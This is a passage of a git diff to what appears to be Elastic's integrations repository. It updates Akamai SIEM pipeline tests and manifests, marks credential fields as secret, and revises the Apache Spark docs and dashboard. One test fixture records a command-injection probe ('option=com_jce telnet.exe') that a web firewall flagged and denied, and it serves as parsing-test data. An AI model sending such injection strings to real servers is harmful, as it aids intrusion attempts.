c0e3277b040..53132e063c5 100644 --- a/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json +++ b/packages/akamai/data_stream/siem/_dev/test/pipeline/test-http-json.log-expected.json @@ -175,6 +175,170 @@ "query": "option=com_jce telnet.exe" } }, + { + "@timestamp": "2017-04-04T10:57:02.000Z", + "akamai": { + "siem": { + "bot": { + "response_segment": 3, + "score": 100 + }, + "client_data": { + "app_bundle_id": "com.mydomain.myapp", + "app_version": "1.23", + "sdk_version": "4.7.1", + "telemetry_type": 2 + }, + "config_id": "14227", + "policy_id": "qik1_26545", + "request": { + "headers": { + "Accept-Encoding": "gzip", + "Host": "example.com" + } + }, + "response": { + "headers": { + "Content-Length": "150", + "Content-Type": "text/html", + "Mime-Version": "1.0", + "Server": "AkamaiGHost" + } + }, + "rule_actions": [ + "alert", + "deny" + ], + "rule_tags": [ + "owasp_crs/web_attack/file_injection", + "owasp_crs/web_attack/command_inject" + ], + "rules": [ + { + "ruleActions": "alert", + "ruleData": "telnet.exe", + "ruleMessages": "System Command Access", + "ruleSelectors": "ARGS:option", + "ruleTags": "OWASP_CRS/WEB_ATTACK/FILE_INJECTION", + "ruleVersions": "4", + "rules": "950002" + }, + { + "ruleActions": "alert", + "ruleData": "telnet.exe", + "ruleMessages": "System Command Injection", + "ruleSelectors": "ARGS:option", + "ruleTags": "OWASP_CRS/WEB_ATTACK/COMMAND_INJECT", + "ruleVersions": "4", + "rules": "950006" + }, + { + "ruleActions": "deny", + "ruleData": "Vector Score: 10, DENY threshold: 9, Ale", + "ruleMessages": "Anomaly Score Exceeded fo", + "ruleVersions": "1", + "rules": "CMD-INJECTION-ANOMALY" + } + ], + "user_risk": { + "allow": 0, + "score": 75, + "status": 0, + "uuid": "964d54b7-0821-413a-a4d6-8131770ec8d5" + } + } + }, + "client": { + "address": "89.160.20.156", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.156" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "category": [ + "network" + ], + "id": "1158db1758e37bfe67b7c09", + "kind": "event", + "original": "{\"format\":\"json\",\"type\":\"akamai_siem\",\"version\":\"1.0\",\"attackData\":{\"clientIP\":\"89.160.20.156\",\"configId\":\"14227\",\"policyId\":\"qik1_26545\",\"ruleActions\":\"YWxlcnQ%3d%3bYWxlcnQ%3d%3bZGVueQ%3d%3d\",\"ruleData\":\"dGVsbmV0LmV4ZQ%3d%3d%3bdGVsbmV0LmV4ZQ%3d%3d%3bVmVjdG9yIFNjb3JlOiAxMCwgREVOWSB0aHJlc2hvbGQ6IDksIEFsZX \",\"ruleMessages\":\"U3lzdGVtIENvbW1hbmQgQWNjZXNz%3bU3lzdGVtIENvbW1hbmQgSW5qZWN0aW9u%3bQW5vbWFseSBTY29yZSBFeGNlZWRlZCBmb3 \",\"ruleSelectors\":\"QVJHUzpvcHRpb24%3d%3bQVJHUzpvcHRpb24%3d%3b\",\"ruleTags\":\"T1dBU1BfQ1JTL1dFQl9BVFRBQ0svRklMRV9JTkpFQ1RJT04%3d%3bT1dBU1BfQ1JTL1dFQl9BVFRBQ0svQ09NTUFORF9JTkpFQ1R \",\"ruleVersions\":\"NA%3d%3d%3bNA%3d%3d%3bMQ%3d%3d\",\"rules\":\"OTUwMDAy%3bOTUwMDA2%3bQ01ELUlOSkVDVElPTi1BTk9NQUxZ\"},\"geo\":{\"asn\":\"14618\",\"city\":\"ASHBURN\",\"continent\":\"288\",\"country\":\"US\",\"regionCode\":\"VA\"},\"httpMessage\":{\"bytes\":\"266\",\"host\":\"www.hmapi.com\",\"method\":\"GET\",\"path\":\"/\",\"port\":\"80\",\"protocol\":\"HTTP/1.1\",\"query\":\"option=com_jce%20telnet.exe\",\"requestHeaders\":\"Host:%20example.com%0D%0Ajsessionid:%0D%0AAccept-Encoding:%20gzip%0D%0A\",\"requestId\":\"1158db1758e37bfe67b7c09\",\"responseHeaders\":\"Server:%20AkamaiGHost%0D%0AMime-Version:%201.0%0D%0AContent-Type:%20text/html%0D%0AContent-Length:%20150%0D%0AX-NoValueHeader:%0D%0A\",\"start\":\"1491303422\",\"status\":\"200\"},\"userRiskData\":{\"uuid\":\"964d54b7-0821-413a-a4d6-8131770ec8d5\",\"status\":\"0\",\"score\":\"75\",\"risk\":\"\",\"trust\":\"\",\"general\":\"\",\"allow\":\"0\"},\"clientData\":{\"appBundleId\":\"com.mydomain.myapp\",\"appVersion\":\"1.23\",\"sdkVersion\":\"4.7.1\",\"telemetryType\":\"2\"},\"botData\":{\"botScore\":\"100\",\"responseSegment\":\"3\"}}", + "start": "2017-04-04T10:57:02.000Z" + }, + "http": { + "request": { + "id": "1158db1758e37bfe67b7c09", + "method": "GET" + }, + "response": { + "bytes": 266, + "status_code": 200 + }, + "version": "1.1" + }, + "network": { + "protocol": "http", + "transport": "tcp" + }, + "observer": { + "type": "proxy", + "vendor": "akamai" + }, + "related": { + "ip": [ + "89.160.20.156" + ] + }, + "source": { + "address": "89.160.20.156", + "as": { + "number": 29518, + "organization": { + "name": "Bredband2 AB" + } + }, + "geo": { + "city_name": "Linköping", + "continent_name": "Europe", + "country_iso_code": "SE", + "country_name": "Sweden", + "location": { + "lat": 58.4167, + "lon": 15.6167 + }, + "region_iso_code": "SE-E", + "region_name": "Östergötland County" + }, + "ip": "89.160.20.156" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "www.hmapi.com", + "full": "www.hmapi.com/?option=com_jce%20telnet.exe", + "path": "/", + "port": 80, + "query": "option=com_jce telnet.exe" + } + }, { "@timestamp": "2016-08-11T13:45:33.026Z", "akamai": { diff --git a/packages/akamai/data_stream/siem/_dev/test/system/test-default-config.yml b/packages/akamai/data_stream/siem/_dev/test/system/test-default-config.yml deleted file mode 100644 index 99922354029..00000000000 --- a/packages/akamai/data_stream/siem/_dev/test/system/test-default-config.yml +++ /dev/null @@ -1,16 +0,0 @@ -input: httpjson -service: akamai -vars: ~ -data_stream: - vars: - preserve_original_event: true - api_host: "http://{{Hostname}}:{{Port}}" - client_token: qwerasdf - client_secret: qazwsx - access_token: abcd - config_ids: aaaa - ssl: - verification_mode: none - enable_request_tracer: true -assert: - hit_count: 3 diff --git a/packages/akamai/data_stream/siem/_dev/test/system/test-emulator-config.yml b/packages/akamai/data_stream/siem/_dev/test/system/test-emulator-config.yml new file mode 100644 index 00000000000..ec8b4713d27 --- /dev/null +++ b/packages/akamai/data_stream/siem/_dev/test/system/test-emulator-config.yml @@ -0,0 +1,16 @@ +input: httpjson +service: akamai-siem-emulator +vars: ~ +data_stream: + vars: + preserve_original_event: true + api_host: "http://akamai-siem-emulator:9903" + client_token: ct-f625f0b8-9c8f-44ce-8250-eaf17bc93051 + client_secret: cs-0d15cfd9-764a-48e6-a822-22756180ddb8 + access_token: at-6b8c7217-8748-490d-b0f5-bfeb72b2e7cd + config_ids: 123456 + event_limit: 20 + enable_request_tracer: true +assert: + # 24 hours at 5 minutes between events. + hit_count: 288 # = 24 * 60/5 diff --git a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml index 38f9bf9a26a..c9624ee5e76 100644 --- a/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml +++ b/packages/akamai/data_stream/siem/elasticsearch/ingest_pipeline/default.yml @@ -67,10 +67,12 @@ processors: target_field: url.domain ignore_missing: true - urldecode: + tag: urldecode_httpMessage_path field: json.httpMessage.path target_field: url.path ignore_missing: true - urldecode: + tag: urldecode_httpMessage_query field: json.httpMessage.query target_field: url.query ignore_missing: true @@ -83,24 +85,28 @@ processors: type: long ignore_missing: true - urldecode: + tag: urldecode_httpMessage_responseHeaders field: json.httpMessage.responseHeaders - target_field: _tmp.response.headers ignore_missing: true - kv: - field: _tmp.response.headers + if: ctx.json?.httpMessage?.responseHeaders != "" + tag: kv_httpMessage_responseHeaders + field: json.httpMessage.responseHeaders target_field: akamai.siem.response.headers field_split: '\r\n' - value_split: ': ' + value_split: ':\s*' ignore_missing: true - urldecode: + tag: urldecode_httpMessage_requestHeaders field: json.httpMessage.requestHeaders - target_field: _tmp.request.headers ignore_missing: true - kv: - field: _tmp.request.headers + if: ctx.json?.httpMessage?.requestHeaders != "" + tag: kv_httpMessage_requestHeaders + field: json.httpMessage.requestHeaders target_field: akamai.siem.request.headers field_split: '\r\n' - value_split: ': ' + value_split: ':\s*' ignore_missing: true - script: lang: painless @@ -194,6 +200,7 @@ processors: ignore_missing: true ## Attack Data - urldecode: + tag: urldecode_attackData_ruleActions field: json.attackData.ruleActions target_field: json.attackData.ruleActions ignore_missing: true @@ -203,6 +210,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_ruleData field: json.attackData.ruleData target_field: json.attackData.ruleData ignore_missing: true @@ -212,6 +220,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_ruleMessages field: json.attackData.ruleMessages target_field: json.attackData.ruleMessages ignore_missing: true @@ -221,6 +230,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_ruleSelectors field: json.attackData.ruleSelectors target_field: json.attackData.ruleSelectors ignore_missing: true @@ -230,6 +240,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_ruleTags field: json.attackData.ruleTags target_field: json.attackData.ruleTags ignore_missing: true @@ -239,6 +250,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_ruleVersions field: json.attackData.ruleVersions target_field: json.attackData.ruleVersions ignore_missing: true @@ -248,6 +260,7 @@ processors: separator: ';' preserve_trailing: true - urldecode: + tag: urldecode_attackData_rules field: json.attackData.rules target_field: json.attackData.rules ignore_missing: true @@ -259,6 +272,7 @@ processors: - script: lang: painless description: Base64 Decode the json.attackData.rule* fields + tag: script_base64_decode_attackData_rule source: | ArrayList items = new ArrayList(["rules", "ruleActions", "ruleData", "ruleMessages", "ruleTags", "ruleSelectors", "ruleVersions"]); ArrayList rules_array = new ArrayList(); @@ -386,18 +400,24 @@ processors: type: long ignore_missing: true - kv: + if: ctx.json?.userRiskData?.risk != "" + tag: kv_userRiskData_risk field: json.userRiskData.risk target_field: akamai.siem.user_risk.risk field_split: '\|' value_split: ':' ignore_missing: true - kv: + if: ctx.json?.userRiskData?.trust != "" + tag: kv_userRiskData_trust field: json.userRiskData.trust target_field: akamai.siem.user_risk.trust field_split: '\|' value_split: ':' ignore_missing: true - kv: + if: ctx.json?.userRiskData?.general != "" + tag: kv_userRiskData_general field: json.userRiskData.general target_field: akamai.siem.user_risk.general field_split: '\|' @@ -458,4 +478,7 @@ on_failure: value: pipeline_error - append: field: error.message - value: '{{{ _ingest.on_failure_message }}}' + value: >- + Processor '{{ _ingest.on_failure_processor_type }}' + {{#_ingest.on_failure_processor_tag}}with tag '{{ _ingest.on_failure_processor_tag }}' + {{/_ingest.on_failure_processor_tag}}failed with message '{{ _ingest.on_failure_message }}' diff --git a/packages/akamai/data_stream/siem/fields/fields.yml b/packages/akamai/data_stream/siem/fields/fields.yml index c028f1c954e..ba1f681e4c9 100644 --- a/packages/akamai/data_stream/siem/fields/fields.yml +++ b/packages/akamai/data_stream/siem/fields/fields.yml @@ -20,6 +20,28 @@ description: > Rules triggered by this request + fields: + - name: ruleVersions + type: keyword + description: Versions of rules triggered for this request. + - name: ruleMessages + type: keyword + description: Messages of rules that triggered for this request. + - name: ruleTags + type: keyword + description: Tags of rules that triggered for this request. + - name: ruleActions + type: keyword + description: Actions of rules that triggered for this request. + - name: rules + type: keyword + description: Rules that triggered for this request. + - name: ruleData + type: keyword + description: User data of rules that triggered for this request. + - name: ruleSelectors + type: keyword + description: Selectors of rules that triggered for this request. - name: rule_actions type: keyword description: > diff --git a/packages/akamai/data_stream/siem/manifest.yml b/packages/akamai/data_stream/siem/manifest.yml index 1de85ac81b0..3cfdaffbb7d 100644 --- a/packages/akamai/data_stream/siem/manifest.yml +++ b/packages/akamai/data_stream/siem/manifest.yml @@ -16,12 +16,13 @@ streams: show_user: true default: https://akzz-XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.luna.akamaiapis.net - name: client_token - type: text + type: password title: Client Token description: Client token provided by "Credentials" ui multi: false required: true show_user: true + secret: true - name: client_secret type: password title: Client Secret @@ -29,6 +30,7 @@ streams: multi: false required: true show_user: true + secret: true - name: access_token type: password title: Access Token @@ -36,6 +38,7 @@ streams: multi: false required: true show_user: true + secret: true - name: config_ids type: text title: Zone ID @@ -140,6 +143,7 @@ streams: multi: false required: false show_user: true + secret: true - name: service_account_file type: text title: "Credentials file path" diff --git a/packages/akamai/docs/README.md b/packages/akamai/docs/README.md index 9b8f02b0339..43074ae0ed7 100644 --- a/packages/akamai/docs/README.md +++ b/packages/akamai/docs/README.md @@ -41,7 +41,13 @@ See [Akamai API get started](https://techdocs.akamai.com/siem-integration/refere | akamai.siem.response.headers | HTTP response headers | flattened | | akamai.siem.rule_actions | Actions taken for this request. | keyword | | akamai.siem.rule_tags | The set of categories for the triggered rule. | keyword | -| akamai.siem.rules | Rules triggered by this request | nested | +| akamai.siem.rules.ruleActions | Actions of rules that triggered for this request. | keyword | +| akamai.siem.rules.ruleData | User data of rules that triggered for this request. | keyword | +| akamai.siem.rules.ruleMessages | Messages of rules that triggered for this request. | keyword | +| akamai.siem.rules.ruleSelectors | Selectors of rules that triggered for this request. | keyword | +| akamai.siem.rules.ruleTags | Tags of rules that triggered for this request. | keyword | +| akamai.siem.rules.ruleVersions | Versions of rules triggered for this request. | keyword | +| akamai.siem.rules.rules | Rules that triggered for this request. | keyword | | akamai.siem.slow_post_action | Action taken if a Slow POST attack is detected: W for Warn or A for deny (abort). | keyword | | akamai.siem.slow_post_rate | Recorded rate of a detected Slow POST attack. | long | | akamai.siem.user_risk.allow | Indicates whether the user is on the allow list. A 0 indicates that the user was not on the list; a 1 indicates that the user was on the list. | long | diff --git a/packages/akamai/manifest.yml b/packages/akamai/manifest.yml index b8e8a35394c..7e332f7b83b 100644 --- a/packages/akamai/manifest.yml +++ b/packages/akamai/manifest.yml @@ -1,13 +1,13 @@ name: akamai title: Akamai -version: "2.21.1" +version: "2.23.2" description: Collect logs from Akamai with Elastic Agent. type: integration -format_version: "3.0.0" +format_version: "3.0.2" categories: [security, cdn_security] conditions: kibana: - version: "^8.7.1" + version: "^8.12.0" icons: - src: /img/akamai_logo.svg title: Akamai diff --git a/packages/amazon_security_lake/changelog.yml b/packages/amazon_security_lake/changelog.yml index 169c618f1c0..042c53d525a 100644 --- a/packages/amazon_security_lake/changelog.yml +++ b/packages/amazon_security_lake/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.1.0" + changes: + - description: Set sensitive values as secret. + type: enhancement + link: https://github.com/elastic/integrations/pull/8725 - version: "1.0.1" changes: - description: Changed owners diff --git a/packages/amazon_security_lake/data_stream/event/manifest.yml b/packages/amazon_security_lake/data_stream/event/manifest.yml index ae338dc7a22..cfdaa053df2 100644 --- a/packages/amazon_security_lake/data_stream/event/manifest.yml +++ b/packages/amazon_security_lake/data_stream/event/manifest.yml @@ -22,6 +22,7 @@ streams: required: false show_user: true description: First part of access key. + secret: true - name: secret_access_key type: password title: Secret Access Key @@ -29,13 +30,15 @@ streams: required: false show_user: true description: Second part of access key. + secret: true - name: session_token - type: text + type: password title: Session Token multi: false required: false show_user: true description: Required when using temporary security credentials. + secret: true - name: decoding_batch_size type: integer title: Batch Size of Parquet Decoding diff --git a/packages/amazon_security_lake/manifest.yml b/packages/amazon_security_lake/manifest.yml index e12e750aff1..7a775283cb1 100644 --- a/packages/amazon_security_lake/manifest.yml +++ b/packages/amazon_security_lake/manifest.yml @@ -1,13 +1,13 @@ format_version: "3.0.0" name: amazon_security_lake title: Amazon Security Lake -version: "1.0.1" +version: "1.1.0" description: Collect logs from Amazon Security Lake with Elastic Agent. type: integration categories: ["aws", "security"] conditions: kibana: - version: ^8.11.0 + version: ^8.12.0 elastic: subscription: basic screenshots: diff --git a/packages/apache_spark/_dev/build/docs/README.md b/packages/apache_spark/_dev/build/docs/README.md index 2f72c5695ee..3d88a86a7f7 100644 --- a/packages/apache_spark/_dev/build/docs/README.md +++ b/packages/apache_spark/_dev/build/docs/README.md @@ -1,13 +1,38 @@ # Apache Spark Integration -The Apache Spark integration collects and parses data using the Jolokia Input. +## Overview + +[Apache Spark](https://spark.apache.org) is an open-source, distributed computing system that provides a fast and general-purpose cluster-computing framework. It offers in-memory data processing capabilities, which significantly enhances the performance of big data analytics applications. Spark provides support for a variety of programming languages including Scala, Python, Java, and R, and comes with built-in modules for SQL, streaming, machine learning, and graph processing. This makes it a versatile tool for a wide range of data processing and analysis tasks. + +Use the Apache Spark integration to: + +- Collect metrics related to the application, driver, executor and node. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + +## Data streams + +The Apache Spark integration collects metrics data. + +Metrics provide insight into the statistics of Apache Spark. The `Metric` data streams collected by the Apache Spark integration include `application`, `driver`, `executor`, and `node`, allowing users to monitor and troubleshoot the performance of their Apache Spark instance. + +Data streams: +- `application`: Collects information related to the number of cores used, application name, runtime in milliseconds and current status of the application. +- `driver`: Collects information related to the driver details, job durations, task execution, memory usage, executor status and JVM metrics. +- `executor`: Collects information related to the operations, memory usage, garbage collection, file handling, and threadpool activity. +- `node`: Collects information related to the application count, waiting applications, worker metrics, executor count, core usage and memory usage. + +Note: +- Users can monitor and view the metrics inside the ingested documents for Apache Spark under the `metrics-*` index pattern in `Discover`. ## Compatibility -This integration has been tested against `Apache Spark version 3.5.0` +This integration has been tested against `Apache Spark version 3.5.0`. ## Requirements +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + In order to ingest data from Apache Spark, you must know the full hosts for the Main and Worker nodes. To proceed with the Jolokia setup, Apache Spark should be installed as a standalone setup. Make sure that the spark folder is installed in the `/usr/local` path. If not, then specify the path of spark folder in the further steps. You can install the standalone setup from the official download page of [Apache Spark](https://spark.apache.org/downloads.html). @@ -63,15 +88,23 @@ Restart Spark master. Follow the same set of steps for Spark Worker, Driver and Executor. -### Troubleshooting +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Validation + +After the integration is successfully configured, click on the *Assets* tab of the Apache Spark Integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. + +## Troubleshooting -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Application``, ``Driver``, ``Executor`` and ``Node`` data stream's indices. +If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Application``, ``Driver``, ``Executor`` and ``Node`` data stream. ## Metrics ### Application -This is the `application` data stream. +The `application` data stream collects metrics related to the number of cores used, application name, runtime in milliseconds, and current status of the application. {{event "application"}} @@ -79,7 +112,7 @@ This is the `application` data stream. ### Driver -This is the `driver` data stream. +The `driver` data stream collects metrics related to the driver details, job durations, task execution, memory usage, executor status, and JVM metrics. {{event "driver"}} @@ -87,7 +120,7 @@ This is the `driver` data stream. ### Executor -This is the `executor` data stream. +The `executor` data stream collects metrics related to the operations, memory usage, garbage collection, file handling, and threadpool activity. {{event "executor"}} @@ -95,7 +128,7 @@ This is the `executor` data stream. ### Node -This is the `node` data stream. +The `node` data stream collects metrics related to the application count, waiting applications, worker metrics, executor count, core usage, and memory usage. {{event "node"}} diff --git a/packages/apache_spark/changelog.yml b/packages/apache_spark/changelog.yml index a6f5fb042d8..7a7d5175d28 100644 --- a/packages/apache_spark/changelog.yml +++ b/packages/apache_spark/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "1.0.3" + changes: + - description: Update README to follow documentation guidelines. + type: enhancement + link: https://github.com/elastic/integrations/pull/9068 +- version: "1.0.2" + changes: + - description: Inline "by reference" visualizations + type: enhancement + link: https://github.com/elastic/integrations/pull/8423 +- version: "1.0.1" + changes: + - description: Update the link to the correct reindexing procedure. + type: bugfix + link: https://github.com/elastic/integrations/pull/9021 - version: "1.0.0" changes: - description: Make Apache Spark GA. diff --git a/packages/apache_spark/docs/README.md b/packages/apache_spark/docs/README.md index 0534f84a922..f42e8023eee 100644 --- a/packages/apache_spark/docs/README.md +++ b/packages/apache_spark/docs/README.md @@ -1,13 +1,38 @@ # Apache Spark Integration -The Apache Spark integration collects and parses data using the Jolokia Input. +## Overview + +[Apache Spark](https://spark.apache.org) is an open-source, distributed computing system that provides a fast and general-purpose cluster-computing framework. It offers in-memory data processing capabilities, which significantly enhances the performance of big data analytics applications. Spark provides support for a variety of programming languages including Scala, Python, Java, and R, and comes with built-in modules for SQL, streaming, machine learning, and graph processing. This makes it a versatile tool for a wide range of data processing and analysis tasks. + +Use the Apache Spark integration to: + +- Collect metrics related to the application, driver, executor and node. +- Create visualizations to monitor, measure, and analyze usage trends and key data, deriving business insights. +- Create alerts to reduce the MTTD and MTTR by referencing relevant logs when troubleshooting an issue. + +## Data streams + +The Apache Spark integration collects metrics data. + +Metrics provide insight into the statistics of Apache Spark. The `Metric` data streams collected by the Apache Spark integration include `application`, `driver`, `executor`, and `node`, allowing users to monitor and troubleshoot the performance of their Apache Spark instance. + +Data streams: +- `application`: Collects information related to the number of cores used, application name, runtime in milliseconds and current status of the application. +- `driver`: Collects information related to the driver details, job durations, task execution, memory usage, executor status and JVM metrics. +- `executor`: Collects information related to the operations, memory usage, garbage collection, file handling, and threadpool activity. +- `node`: Collects information related to the application count, waiting applications, worker metrics, executor count, core usage and memory usage. + +Note: +- Users can monitor and view the metrics inside the ingested documents for Apache Spark under the `metrics-*` index pattern in `Discover`. ## Compatibility -This integration has been tested against `Apache Spark version 3.5.0` +This integration has been tested against `Apache Spark version 3.5.0`. ## Requirements +You need Elasticsearch for storing and searching your data and Kibana for visualizing and managing it. You can use our hosted Elasticsearch Service on Elastic Cloud, which is recommended, or self-manage the Elastic Stack on your own hardware. + In order to ingest data from Apache Spark, you must know the full hosts for the Main and Worker nodes. To proceed with the Jolokia setup, Apache Spark should be installed as a standalone setup. Make sure that the spark folder is installed in the `/usr/local` path. If not, then specify the path of spark folder in the further steps. You can install the standalone setup from the official download page of [Apache Spark](https://spark.apache.org/downloads.html). @@ -63,15 +88,23 @@ Restart Spark master. Follow the same set of steps for Spark Worker, Driver and Executor. -### Troubleshooting +## Setup + +For step-by-step instructions on how to set up an integration, see the [Getting Started](https://www.elastic.co/guide/en/welcome-to-elastic/current/getting-started-observability.html) guide. + +## Validation + +After the integration is successfully configured, click on the *Assets* tab of the Apache Spark Integration to display the available dashboards. Select the dashboard for your configured data stream, which should be populated with the required data. + +## Troubleshooting -If host.ip is shown conflicted under ``metrics-*`` data view, then this issue can be solved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/use-a-data-stream.html#reindex-with-a-data-stream) the ``Application``, ``Driver``, ``Executor`` and ``Node`` data stream's indices. +If `host.ip` appears conflicted under the ``metrics-*`` data view, this issue can be resolved by [reindexing](https://www.elastic.co/guide/en/elasticsearch/reference/current/tsds-reindex.html) the ``Application``, ``Driver``, ``Executor`` and ``Node`` data stream. ## Metrics ### Application -This is the `application` data stream. +The `application` data stream collects metrics related to the number of cores used, application name, runtime in milliseconds, and current status of the application. An example event for `application` looks as following: @@ -182,7 +215,7 @@ An example event for `application` looks as following: ### Driver -This is the `driver` data stream. +The `driver` data stream collects metrics related to the driver details, job durations, task execution, memory usage, executor status, and JVM metrics. An example event for `driver` looks as following: @@ -364,7 +397,7 @@ An example event for `driver` looks as following: ### Executor -This is the `executor` data stream. +The `executor` data stream collects metrics related to the operations, memory usage, garbage collection, file handling, and threadpool activity. An example event for `executor` looks as following: @@ -543,7 +576,7 @@ An example event for `executor` looks as following: ### Node -This is the `node` data stream. +The `node` data stream collects metrics related to the application count, waiting applications, worker metrics, executor count, core usage, and memory usage. An example event for `node` looks as following: diff --git a/packages/apache_spark/kibana/dashboard/apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156.json b/packages/apache_spark/kibana/dashboard/apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156.json index 9146422a21c..7b4bb5b4b65 100644 --- a/packages/apache_spark/kibana/dashboard/apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156.json +++ b/packages/apache_spark/kibana/dashboard/apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156.json @@ -1,2817 +1,3109 @@ { - "attributes": { - "description": "", - "hits": 0, - "kibanaSavedObjectMeta": { - "searchSourceJSON": { - "filter": [], - "query": { - "language": "kuery", - "query": "" - } - } - }, - "optionsJSON": { - "hidePanelTitles": false, - "syncColors": false, - "useMargins": true - }, - "panelsJSON": [ - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-d7cd2d50-503d-48cc-b9d1-77da873349ef", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "9857a495-b7e6-4893-93e6-f16c050e0e41", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d59683b7-5f29-46b9-b01b-20b6aea422fe", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "d7cd2d50-503d-48cc-b9d1-77da873349ef": { - "columnOrder": [ - "f9bf9e21-aaa3-4948-9239-59ff6afb84d9", - "9401333e-571b-4999-9f50-405cad23cd1a" - ], - "columns": { - "9401333e-571b-4999-9f50-405cad23cd1a": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.driver.memory.used" - }, - "f9bf9e21-aaa3-4948-9239-59ff6afb84d9": { - "customLabel": true, - "dataType": "date", - "isBucketed": true, - "label": "Timestamp", - "operationType": "date_histogram", - "params": { - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "9857a495-b7e6-4893-93e6-f16c050e0e41", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.driver" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.driver" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d59683b7-5f29-46b9-b01b-20b6aea422fe", - "key": "apache_spark.driver.memory.used", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.driver.memory.used" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "curveType": "LINEAR", - "fittingFunction": "Linear", - "gridlinesVisibilitySettings": { - "x": false, - "yLeft": false, - "yRight": true - }, - "layers": [ - { - "accessors": [ - "9401333e-571b-4999-9f50-405cad23cd1a" - ], - "layerId": "d7cd2d50-503d-48cc-b9d1-77da873349ef", - "layerType": "data", - "position": "top", - "seriesType": "area_stacked", - "showGridlines": false, - "xAccessor": "f9bf9e21-aaa3-4948-9239-59ff6afb84d9", - "yConfig": [ - { - "axisMode": "left", - "forAccessor": "9401333e-571b-4999-9f50-405cad23cd1a" - } - ] - } - ], - "legend": { - "horizontalAlignment": "left", - "isInside": false, - "isVisible": true, - "position": "top", - "showSingleSeries": true, - "verticalAlignment": "top" - }, - "preferredSeriesType": "bar_stacked", - "title": "Empty XY chart", - "valueLabels": "hide", - "xTitle": "Timestamp", - "yLeftExtent": { - "mode": "full" - }, - "yRightExtent": { - "mode": "full" - }, - "yTitle": "Memory" - } + "id": "apache_spark-b22dc960-a06c-11ec-8d4f-4fe3367a4156", + "type": "dashboard", + "namespaces": [ + "default" + ], + "migrationVersion": { + "dashboard": "8.7.0" + }, + "coreMigrationVersion": "8.8.0", + "typeMigrationVersion": "8.7.0", + "updated_at": "2023-11-07T16:02:34.119Z", + "created_at": "2023-11-07T16:02:34.119Z", + "version": "Wzc5LDFd", + "attributes": { + "description": "", + "hits": 0, + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "useMargins": true + }, + "panelsJSON": [ + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 17, + "i": "a3339a86-6f2b-4f1a-85b8-4619c417a110", + "w": 24, + "x": 0, + "y": 0 + }, + "panelIndex": "a3339a86-6f2b-4f1a-85b8-4619c417a110", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-d7cd2d50-503d-48cc-b9d1-77da873349ef", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": 